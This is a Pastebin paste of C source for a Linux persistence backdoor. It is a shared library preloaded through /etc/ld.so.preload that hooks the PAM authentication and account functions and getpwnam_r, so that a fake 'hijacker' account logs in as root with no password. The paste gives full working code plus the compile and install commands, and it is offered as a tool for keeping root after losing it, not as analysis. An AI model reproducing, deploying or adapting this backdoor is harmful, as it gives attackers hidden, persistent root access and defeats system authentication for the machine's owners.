Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- Filename: LinuxBypassSO.c
- Author: Goodies (gumshoe on IRCs)
- Description: This is a backdoor with the purpose of hijacking the Linux authentication functions
- and the functions that parse /etc/passwd to allow a non-existant account root access
- without a password or authentication. This is a backdoor and must be ran as root at
- some point. If you lose root access but have access to a local account, you will be
- able to sign in and acheive root access easily. This will also be used in the future
- to allow SSH logins (which requires more functions to be hooked).
- Usage Examples:
- From Root:
- gcc -shared -fPIC -o ./bypass.so LinuxBypassSO.c -ldl
- echo "`pwd`/bypass.so" > /etc/ld.so.preload
- From Any Account:
- su - hijacker
- # root @ Linux acheived #
- */
- #define _GNU_SOURCE
- #include <stdio.h>
- #include <stdlib.h>
- #include <pwd.h>
- #include <dlfcn.h>
- #include <security/pam_appl.h>
- #include <security/pam_modules.h>
- #include <string.h>
- #define HIJACK_LOGIN "hijacker"
- #define AUTHOR "Goodies" //@GoodiesHQ on Twitter
- static int (*old_pam_authenticate)(pam_handle_t*, int);
- static int (*old_getpwnam_r)(const char*, struct passwd*, char*, size_t, struct passwd**);
- static int (*old_pam_acct_mgmt)(pam_handle_t*, int);
- static char *hijacker = NULL, *r00t = NULL;
- __attribute__((constructor)) void init(){
- if(!hijacker || strcmp(hijacker, "") || hijacker == NULL)
- hijacker = strdup(HIJACK_LOGIN);
- if(!r00t || strcmp(r00t, "") || r00t == NULL)
- r00t = strdup("root");
- if(!old_pam_authenticate)
- old_pam_authenticate = dlsym(RTLD_NEXT, "pam_authenticate");
- if(!old_getpwnam_r)
- old_getpwnam_r = dlsym(RTLD_NEXT, "getpwnam_r");
- if(!old_pam_acct_mgmt)
- old_pam_acct_mgmt = dlsym(RTLD_NEXT, "pam_acct_mgmt");
- }
- int getpwnam_r(const char *name, struct passwd *pwd, char *buf, size_t buflen, struct passwd **result){
- if(strstr(name, hijacker)){
- pwd -> pw_gid = 0;
- return old_getpwnam_r(r00t, pwd, buf, buflen, result);
- }else
- return old_getpwnam_r(name, pwd, buf, buflen, result);
- }
- int pam_authenticate(pam_handle_t *pamh, int flags){
- void *pam_user = NULL; // populated in pam_get_item
- pam_get_item(pamh, PAM_USER,(const void**)&pam_user);
- // Gets the username parameter passed
- if(strstr(pam_user, hijacker))
- return PAM_SUCCESS; // If the user passed is HIJACK_LOGIN, return success message
- return old_pam_authenticate(pamh, flags);
- // otherwise, return the legitimate success/error
- }
- int pam_acct_mgmt(pam_handle_t *pamh, int flags){
- void *pam_user = NULL; // populated in pam_get_item
- pam_get_item(pamh, PAM_USER,(const void**)&pam_user);
- // Gets the username parameter passed
- if(strstr(pam_user, hijacker))
- return PAM_SUCCESS; // If the user passed is HIJACK_LOGIN, return success message
- return old_pam_acct_mgmt(pamh, flags);
- // otherwise, return the legitimate success/error
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement